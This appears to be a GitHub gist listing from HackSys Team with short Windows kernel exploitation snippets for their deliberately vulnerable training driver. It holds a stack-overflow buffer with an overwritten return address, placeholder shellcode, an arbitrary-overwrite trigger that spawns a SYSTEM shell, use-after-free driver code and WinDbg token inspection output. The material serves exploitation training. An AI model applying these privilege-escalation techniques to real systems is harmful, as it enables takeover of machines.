HackSys Team hacksysteam
hacksysteam
/ kernel_bof.py
Created
May 7, 2015 07:53
Exploit Snippet for Stack Overflow in Windows Kernel
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # shellcode real memory address | |
| ring0_shellcode_address = id(ring0_shellcode) + 20 | |
| # pattern offset is 2080 | |
| k_buffer = "\x41" * 2080 | |
| # add the address of ring0 shellcode to the buffer | |
| k_buffer += struct.pack("L", ring0_shellcode_address) |
hacksysteam
/ kernel_bof_gs.py
Created
May 7, 2015 08:02
Exploit Snippet for Stack Overflow in Windows Kernel bypassing GS
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # shellcode start | |
| ring0_shellcode = "\x90" * 8 + "\xcc" | |
| # shellcode end |
hacksysteam
/ kernel_aow.py
Created
May 7, 2015 08:06
Exploit Snippet for Arbitrary Memory Overwrite in Windows Kernel
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| out = c_ulong() | |
| inp = 0x1337 | |
| hola = ntdll.NtQueryIntervalProfile(inp, byref(out)) | |
| print("[+] Spawning SYSTEM Shell") | |
| program_pid = subprocess.Popen("cmd.exe", | |
| creationflags=subprocess.CREATE_NEW_CONSOLE, | |
| close_fds=True).pid |
hacksysteam
/ UseAfterFree.c
Created
May 7, 2015 08:10
Code Snippet for Use After Free Vulnerability in HackSys Extreme Vulnerable Driver
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| NTSTATUS HackSysHandleIoctlCreateBuffer(IN PIRP pIrp, IN PIO_STACK_LOCATION pIoStackIrp) | |
| { | |
| PUSE_AFTER_FREE pUseAfterFree = NULL; | |
| SIZE_T inputBufferSize = 0; | |
| NTSTATUS status = STATUS_UNSUCCESSFUL; | |
| UNREFERENCED_PARAMETER(pIrp); | |
| UNREFERENCED_PARAMETER(pIoStackIrp); | |
| PAGED_CODE(); |
hacksysteam
/ UseAfterFree.h
Created
May 7, 2015 08:12
Code Snippet of Header File for Use After Free Vulnerability in HackSys Extreme Vulnerable Driver
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #ifndef __USE_AFTER_FREE_H__ | |
| #define __USE_AFTER_FREE_H__ | |
| #pragma once | |
| #include "Common.h" | |
| typedef struct _USE_AFTER_FREE { | |
| FunctionPointer pCallback; | |
| CHAR buffer[0x54]; | |
| } USE_AFTER_FREE, *PUSE_AFTER_FREE; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| PROCESS 8570b5e8 SessionId: 1 Cid: 025c Peb: 7ffdf000 ParentCid: 0704 | |
| DirBase: 3eea5340 ObjectTable: 953b8570 HandleCount: 21. | |
| Image: cmd.exe | |
| PROCESS 83dbb020 SessionId: none Cid: 0004 Peb: 00000000 ParentCid: 0000 | |
| DirBase: 00185000 ObjectTable: 87801c98 HandleCount: 481. | |
| Image: System |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| kd> !process 8570b5e8 1 | |
| PROCESS 8570b5e8 SessionId: 1 Cid: 025c Peb: 7ffdf000 ParentCid: 0704 | |
| DirBase: 3eea5340 ObjectTable: 953b8570 HandleCount: 21. | |
| Image: cmd.exe | |
| VadRoot 8553ba60 Vads 37 Clone 0 Private 135. Modified 0. Locked 0. | |
| DeviceMap 92b1bc80 | |
| Token 953b6030 | |
| ElapsedTime 00:02:53.332 | |
| UserTime 00:00:00.000 | |
| . . . |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| kd> !process 83dbb020 1 | |
| PROCESS 83dbb020 SessionId: none Cid: 0004 Peb: 00000000 ParentCid: 0000 | |
| DirBase: 00185000 ObjectTable: 87801c98 HandleCount: 481. | |
| Image: System | |
| VadRoot 84b33cd8 Vads 8 Clone 0 Private 4. Modified 67365. Locked 64. | |
| DeviceMap 87808a38 | |
| Token 878013e0 | |
| ElapsedTime <Invalid> | |
| UserTime 00:00:00.000 | |
| . . . |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| kd> .process /i 8570b5e8 | |
| You need to continue execution (press 'g' <enter>) for the context | |
| to be switched. When the debugger breaks in again, you will be in | |
| the new process context. | |
| kd> g | |
| Break instruction exception - code 80000003 (first chance) | |
| nt!RtlpBreakWithStatusInstruction: | |
| 826c0110 cc int 3 | |
| kd> dg @fs | |
| P Si Gr Pr Lo |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| kd> dt nt!_KPCR 82770c00 | |
| +0x000 NtTib : _NT_TIB | |
| +0x000 Used_ExceptionList : 0x88a573ac _EXCEPTION_REGISTRATION_RECORD | |
| . . . | |
| +0x0d8 Spare1 : 0 '' | |
| +0x0dc KernelReserved2 : [17] 0 | |
| +0x120 PrcbData : _KPRCB |
OlderNewer